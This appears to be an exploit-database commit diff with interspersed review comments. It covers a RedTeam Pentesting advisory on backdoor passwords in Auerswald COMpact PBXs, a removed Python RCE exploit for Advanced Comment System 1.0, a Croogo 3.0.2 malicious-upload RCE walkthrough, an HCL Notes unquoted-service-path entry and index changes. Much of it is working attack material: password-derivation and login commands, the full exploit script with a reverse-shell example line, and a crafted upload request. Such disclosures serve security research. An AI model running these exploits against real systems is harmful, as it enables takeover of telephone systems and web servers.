7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,
Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38
2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0
xCECA93E8, Data CRC: 0x99E65DF1
------------------------------------------------------------------------

The program "dumpimage" (included with u-boot) can be used to list the
partitions in the image file:

------------------------------------------------------------------------
$ dumpimage -l 7_8A_002_COMpact5500.rom
Image Name:
CP5500 125850
Created:
Wed Sep 23 17:04:38 2020
Image Type:
ARM Linux Multi-File Image (uncompressed)
Data Size:
196976634 Bytes = 192359.99 KiB = 187.85 MiB
Load Address: 00000000
Entry Point: 00000000
Contents:
Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB
Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB
------------------------------------------------------------------------

The larger partition then was extracted into the file "rootfs" as
follows:

------------------------------------------------------------------------
$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs
------------------------------------------------------------------------

Contained in the file is an ext2-compatible file system, which was
mounted at "/mnt" and inspected:

------------------------------------------------------------------------
$ file rootfs

rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-
f302d7f20ef1, volume name "7.8A_002_125850."

$ sudo mount -o loop,ro rootfs /mnt

$ cat /mnt/etc/passwd
root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false
------------------------------------------------------------------------

The PBX runs the web server lighttpd[3], the configuration files can be
found in the folder "/opt/auerswald/lighttpd". The web server forwards
most requests via FastCGI to the program "/opt/auerswald/web/webserver".
This program can then be analysed, for example using the reverse
engineering program Ghidra[4].

The manual for the PBX reveals that in order to manage the device, users
need to log in with the username "sub-admin". When this string is
searched within the program in Ghidra, the function which checks
passwords on login can be identified.

It can easily be seen that besides the username "sub-admin" the function
also checks for the hard-coded username "Schandelah", which is the
village of Auerswald's headquarter. Further analysis revealed that the
corresponding password for this username is derived by concatenating the
PBX's serial number, the string "r2d2" and the current date, hashing it
with the MD5 hash algorithm and taking the first seven lower-case hex
chars of the result.

All data needed to derive the password can be accessed without
authentication by requesting the path "/about_state", which is also used
on the website the PBX redirects users to who abort the password prompt
(shortened and formatted to increase readability):

------------------------------------------------------------------------
$ curl --include https://192.168.1.2/about_state
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{
"pbx": "COMpact 5500R",
"pbxType": 35,
"pbxId": 0,
"version": "Version 7.8A - Build 002 ",
"serial": "1234123412",
"date": "30.08.2021",
[...]
}
------------------------------------------------------------------------

The password can be derived as follows:

------------------------------------------------------------------------
$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
1432d89
------------------------------------------------------------------------

This password can then be used for authentication:

------------------------------------------------------------------------
$ curl --include --user 'Schandelah:1432d89' --anyauth \
https://192.168.1.2/tree

HTTP/1.1 302 Found
Location: /statics/html/page_servicetools.html
Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/
[...]
------------------------------------------------------------------------

Next, the endpoint "/logstatus_state" can be queried using the returned
session ID to check the access level:

------------------------------------------------------------------------
% curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Haendler"}
------------------------------------------------------------------------

The returned access level is "Haendler" (reseller). After login, the web
server redirects to a special service page at the path
"/statics/html/page_servicetools.html". Among other things, it allows to
download a backup of all data on the device, configure audio recording
and reset the password, PIN and token for the user "Admin". Accessing
regular administrative functions is not possible directly with this user
account.

When inspecting the password checking function, a second backdoor can be
found. When the username "Admin" is specified, the given password is
tested against the configured password as well as a password derived in
a similar way from the PBX's serial number, the string "r2d2", the
current date and the configured language. The MD5 hash is taken and the
specified password is tested against the first seven characters of the
lower case hexadecimal hash.

The backdoor password for the "Admin" user can be calculated as follows:

------------------------------------------------------------------------
$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'
92fcdd9
------------------------------------------------------------------------

The server returns a session ID for that password and the username
"Admin":

------------------------------------------------------------------------
$ curl --user 'Admin:92fcdd9' --anyauth --include \
https://192.168.1.2/tree

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/
[...]

[{"login":3,"userId":0,"userName":"",[...]}]
------------------------------------------------------------------------

Checking the access level of the session reveals the status
"Administrator":

------------------------------------------------------------------------
$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \
https://192.168.1.2/logstatus_state

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Administrator"}
------------------------------------------------------------------------


Workaround
==========

Disable or restrict access to the web-based management interface if
possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

By inspecting the firmware for the COMpact 5500R PBX, attackers can
easily discover two backdoor passwords. One password is for the secret
user account with the username "Schandelah", the other works as an
alternative password for the user "Admin". Using the backdoor, attackers
are granted access to the PBX with the highest privileges, enabling them
to completely compromise the device. The passwords are derived from the
serial number, the current date and the configured language.

The backdoor passwords are not documented. They secretly coexist with a
documented password recovery function supported by the vendor. No way
was found to disable the backdoor access.

All information needed to derive the passwords can be requested over the
network without authentication, so attackers only require network access
to the web-based management interface.

Due to the ease of exploitation and severe consequences, the backdoor
passwords are rated as a high risk.


Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published


References
==========

[1] https://www.auerswald.de/de/support/download/firmware-compact-5500
[2] https://www.denx.de/wiki/U-Boot
[3] https://www.lighttpd.net
[4] https://ghidra-sre.org


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
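Review bot: the Details block is inconsistent about which products have a fix: the Product line lists COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19") and COMmander Basic.2(19"), but Affected Versions only gives ranges for the COMpact 3000/4000/5000/5200/5500R and COMmander 6000 families, and Fixed Versions names just 8.2B and 4.0T, so an operator of one of those four models cannot tell from this advisory whether a fixed firmware exists. Suggest either listing affected and fixed versions for those models too or stating that no fix is available for them. A smaller point for the Workaround section: the PoC shows /about_state returning the serial number and date without authentication, so limiting who can reach that endpoint belongs in the interim mitigations alongside restricting the management interface.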

@ -1,65 +0,0 @@
# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
# Date: November 30, 2021
# Exploit Author: Nicole Daniella Murillo Mejias
# Version: Advanced Comment System 1.0
# Tested on: Linux

#!/usr/bin/env python3

# DESCRIPTION:
# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the
# response is filtered by the randomly generated alphanumeric string and only command output
# is displayed.
#
# USAGE:
# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted
# If any special characters are used, they should be quoted with single quotes.
#
# Example:
#
# python3 acspoc.py uname -a
# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'

import sys
import base64
import requests
import random

def generate_string(size):
    str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    return ''.join(random.choice(str) for i in range(size))

def exploit(cmd):

    # TODO: Change the URL to the target host
    url = 'http://127.0.0.1/advanced_comment_system/index.php'

    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    encoded_cmd = base64.b64encode(cmd)

    delimiter = generate_string(6).encode()

    body = b'ACS_path=php://input%00&cbcmd='
    body += encoded_cmd
    body += b'&<?php echo " '
    body += delimiter
    body += b': ".shell_exec(base64_decode($_REQUEST["cbcmd"])); die ?>'

    try:
        result = requests.post(url=url, headers=headers, data=body)
    except KeyboardInterrupt:
        print("Keyboard interrupt detected.")
        sys.exit()

    if f'{delimiter.decode()}: ' in result.text:
        position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ")

        if len(result.text[position:]) > 0:
            print(result.text[position:])
        else:
            print(f"No output from command '{cmd.decode()}'")
    print(f"Response size from target host: {len(result.text)} bytes")

if __name__ == "__main__":
    exploit(' '.join(sys.argv[1:]).encode())
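Review bot: this deletion hunk (@ -1,65 +0,0 @@) appears without a file header, so the path of the removed Advanced Comment System PoC is not visible and the diff does not show whether the exploit was dropped from the database or moved to another path; the commit should present the old file name (or the rename with both paths) next to the hunk so the change can be audited.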

72
exploits/php/webapps/50570.txt
Normal file
@ -0,0 +1,72 @@
# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
# Date: 05/12/2021
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> Tutorial <==

1- Login with your privileged account.
2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
3- Click the 'New Attachment' button.
4- Choose a malicious php script and upload it.

########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
############################################################################

5- Click on the URL of malicious php script you uploaded.
6- The malicious PHP script will be executed.


==> HTTP Request (File Upload) <==

POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694
Content-Length: 976
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_method"

POST
-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_csrfToken"

bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb
-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="file"; filename="malicious.php"
Content-Type: application/octet-stream

<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>

-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_Token[fields]"

16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------7028631106888453201670373694
Content-Disposition: form-data; name="_Token[unlocked]"


-----------------------------7028631106888453201670373694--
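Review bot: the sample upload request is not internally consistent: the Cookie header carries csrfToken=bf693e75da3b8cfe... while the _csrfToken form field holds a different, visibly hand-edited value (bf693ebed78cee...qwdfq231341234dsfasdf...), and the same Cookie header includes a GeniXCMS-... cookie that belongs to a different CMS, so the capture cannot have been taken as shown. Suggest replacing the token and session values with clearly marked placeholders, as (HOST) already does for the hostname. The write-up also never states what check is missing; since steps 5 and 6 imply the uploaded .php attachment is served and executed from a web-reachable directory, saying so explicitly would point defenders at the mitigation (restrict attachment file types and disable script execution in the attachments directory) until a fixed version is available.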

28
exploits/windows/local/50566.txt
Normal file
@ -0,0 +1,28 @@
# Exploit Title: HCL Lotus Notes V12- Unquoted Service Path
# Exploit Author: Mert DAŞ
# Version: V12
# Date: 01/12/2021
# Vendor Homepage: https://www.hcltechsw.com/domino/download
# Tested on: Windows 10


ProcessId : 3860
Name : LNSUSvc
DisplayName : HCL Notes Smart Upgrade Hizmeti
PathName : c:\HCL\Notes\SUService.exe
StartName : LocalSystem
StartMode : Auto
State : Running

Discovery
-------------------------
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """


#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
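Review bot: the evidence shown does not establish the precondition for an unquoted service path finding: PathName is c:\HCL\Notes\SUService.exe, a path with no spaces, so the service manager has no ambiguous split point to resolve before the real binary, and the wmic filter (findstr /i /v """) only proves the path is unquoted, not that it is exploitable. Either show an install path that actually contains a space, or this should not be listed as an Unquoted Service Path issue. The #Exploit paragraph is also generic template text; it should name the directory a low-privileged user would need write access to, since without that an administrator cannot verify whether the condition applies on their systems.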

@ -11422,6 +11422,7 @@ id,file,description,date,author,type,platform,port
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||||
|
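Review bot: the new 50566 row indexes the title as "HCL Lotus Notes V12 - Unquoted Service Path" and the author as "Mert Daş", while the submitted 50566.txt header reads "V12- Unquoted Service Path" and "Mert DAŞ"; align the file header with the index so title and author searches match both. Given that the PathName in 50566.txt has no space, this row should only land in files_exploits.csv once the unquoted-path claim has been confirmed against the real service path.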
@ -18571,6 +18572,10 @@ id,file,description,date,author,type,platform,port
50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware,
50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware,
50539,exploits/linux/remote/50539.py,"GNU gdbserver 9.2 - Remote Command Execution (RCE)",1970-01-01,"Roberto Gesteira Miñarro",remote,linux,
50565,exploits/hardware/remote/50565.txt,"Auerswald COMfortel 2.8F - Authentication Bypass",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
50567,exploits/hardware/remote/50567.txt,"Auerswald COMpact 8.0B - Privilege Escalation",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44648,8 +44653,8 @@ id,file,description,date,author,type,platform,port
50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,
50570,exploits/php/webapps/50570.txt,"Croogo 3.0.2 - Remote Code Execution (Authenticated)",1970-01-01,"Deha Berkin Bir",webapps,php,
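Review bot: the hunk header -44648,8 +44653,8 keeps the line count while the 50570 Croogo row is added, so one existing row leaves the index here; the 50559 "Advanced Comment System 1.0 - Remote Command Execution (RCE)" row is the one this hunk removes. Nothing in the diff says why it is withdrawn or whether exploits/php/webapps/50559.py is deleted alongside it; state the reason in the commit message so that consumers of files_exploits.csv can tell a deliberate removal from an accidental drop.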